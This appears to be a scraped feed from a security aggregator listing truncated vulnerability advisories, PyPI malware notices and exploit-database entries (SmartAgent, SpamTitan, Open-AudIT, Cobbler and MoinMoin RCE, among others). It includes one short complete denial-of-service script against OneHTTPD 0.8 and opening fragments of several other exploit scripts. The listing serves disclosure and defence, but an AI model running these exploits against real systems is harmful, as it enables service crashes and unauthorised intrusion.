USN-7762-1: pip vulnerabilities

Dennis Brinkrolf and Tobias Funke discovered that Requests incorrectly leaked Proxy-Authorization headers. A remote attacker could possibly use this issue to obtain sensitive information. This update addresses the issue in the Requests module bundled into pip in Ubuntu 22.04 LTS. CVE-2023-32681 I...

Beebeeto-framework

This is a Python framework for building and executing proof-of-concept POC exploits, specifically targeting the HttpFileServer HFS vulnerability. The framework is called Beebeeto and is maintained by the n0tr00t security team. The framework provides a set of tools and libraries for creating and...

MAL-2025-41707 Malicious code in new-requests-module (PyPI)

--- -= Per source details. Do not edit below this line.=-...

Malicious code in new-requests-module (PyPI)

--- -= Per source details. Do not edit below this line.=-...

MAL-2025-965 Malicious code in reqesst (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 8e4a4682ad923d5e0f2e444487e5f42a4bae8d753ecd747f7b652e407f5cc32f Importing the module downloads and starts an infostealer attempting to exfiltrate data and establishing persistence through autorun directory. --- Category:...

SmartAgent 1.1.0 Remote Code Execution

Exploit Title: SmartAgent v1.1.0 - Unauthenticated Remote Code Execution Date: 01-10-2024 Exploit Author: Alter Prime Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com Version: Build v1.1.0 Tested on: Kali Linux An unauthenticated user can access a php script called...

Hitachi NAS SMU Backup And Restore Insecure Direct Object Reference

!/usr/bin/python3 Title: Hitachi NAS HNAS System Management Unit SMU Backup & Restore IDOR Vulnerability CVE: CVE-2023-5808 Date: 2023-12-13 Exploit Author: Arslan Masood @arszilla Vendor: https://www.hitachivantara.com/ Version: --id --sso " Create --host argument: parser.addargument "--host",...

SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated) Exploit

!/usr/bin/python3 Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored Authenticated Google Dork: intitle:"SCM Manager" intext:1.60 Date: 05-25-2023 Exploit Author: neg0x https://github.com/n3gox/CVE-2023-33829 Vendor Homepage: https://scm-manager.org/ Software Link:...

Exploit for OS Command Injection in Netgate Pfblockerng

pfBlockerNG T...

Exploit for Cross-Site Request Forgery (CSRF) in Cisco Industrial_Network_Director

PoC exploit for CVE-2019-18818, an unauthenticated password rese...

SUSE: Security Advisory (SUSE-SU-2016:0114-1)

The remote host is missing an update for the SPDX-FileCopyrightText: 2021 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

SpamTitan 7.07 Remote Code Execution

Exploit Title: SpamTitan 7.07 - Remote Code Execution Authenticated Date: 2020-09-18 Exploit Author: Felipe Molina @felmoltor Vendor Homepage: https://www.titanhq.com/spamtitan/spamtitangateway/ Software Link: https://www.titanhq.com/signup/?producttype=spamtitangateway Version: 7.07 Tested on:...

Open-AudIT Professional 3.3.1 Remote Code Execution

Exploit Title: Open-AudIT Professional 3.3.1 - Remote Code Execution Date: 2020-04-22 Exploit Author: Askar CVE: CVE-2020-12078 Vendor Homepage: https://opmantek.com/ Version: v3.3.1 Tested on: Ubuntu 18.04 / PHP 7.2.24 !/usr/bin/python3 import requests import sys import warnings import random...

Web-Traffic-Generator - A Quick And Dirty HTTP/S "Organic" Traffic Generator

Just a simple poorly written Python script that aimlessly "browses" the internet by starting at pre-defined rootURLs and randomly "clicking" links on pages until the pre-defined clickDepth is met. I created this as a noise generator to use for an Incident Response / Network Defense simulation. Th...

Cobbler 2.8.0 - (Authenticated) Remote Code Execution

!/usr/bin/python """ Exploit title: Cobbler 2.8.x Authenticated RCE. Author: Dolev Farhi Contact: dolevf at protonmail.com @hack6tence Date: 03-16-2017 Vendor homepage: cobbler.github.io Software version: v.2.5.160805 Software Description ===================== Cobbler is a Linux installation serv...

BackdoorMan - Toolkit That Helps You Find Malicious, Hidden And Suspicious PHP Scripts And Shells

A Python open source toolkit that helps you find malicious, hidden and suspicious PHP scripts and shells in a chosen destination, it automates the process of detecting the above. Purpose The main purpose of BackdoorMan is to help web-masters and developers to discover malicious scripts in their...

MoinMoin - Arbitrary Command Execution

No description provided by source. !/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ?????????? ?????? ??? ??? ??? ?????????? ???????? ??? ??????? \r\n' ascii +=' ??????????? ???????? ??? ???? ??? ??????????? ???????? ??? ??????? \r\n' ascii +=' ??? ??? ??? ??...

OneHTTPD 0.8 - Crash PoC

Exploit for windows platform in category dos / poc from requests import get,ConnectionError as cerror from sys import argv iflenargv!=2: print '%s host' % argv0 else: buff = '/'245 script,host=argv try: get'http://'+host+':8080/'+buff except cerror: exit1 0day.today 2018-04-02...

MoinMoin - Arbitrary Command Execution

!/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██▒ ██▒ ███ ██▒ ██▒█▒███ ██▒ ██▒ ██▒ ██▒...

MoinMoin - Arbitrary Command Execution

MoinMoin - Arbitrary Command Execution !/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██...